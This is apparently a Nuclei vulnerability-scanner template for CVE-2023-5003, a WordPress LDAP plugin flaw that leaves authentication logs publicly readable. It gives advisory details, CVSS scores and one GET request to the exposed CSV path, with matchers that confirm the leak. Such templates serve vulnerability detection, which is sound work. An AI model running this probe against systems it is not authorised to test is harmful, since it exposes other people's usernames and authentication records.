The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
PoC
id: CVE-2023-5003
info:
name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
author: s4e-io
severity: high
description: |
The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
impact: |
Unauthenticated attackers can access sensitive LDAP logs containing authentication credentials and directory information by directly accessing the buffer file URL.
remediation: Fixed in 4.1.10
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-5003
- https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-5003
epss-score: 0.25855
epss-percentile: 0.97868
cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: miniorange
product: active_directory_integration_\/_ldap_integration
framework: wordpress
tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/ldap-authentication-report.csv"
matchers-condition: and
matchers:
- type: word
words:
- "ID"
- "USERNAME"
- "TIME"
- "LDAP STATUS"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220662bce9455003fad66dd6b192bbfd77504bb26d2c9d79da28f075361ea87dd11022100ad0e43e628728e7d19aafe868fc30e0e8d6b47fd6da2c94e2f4e4a2caadc9b3d:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.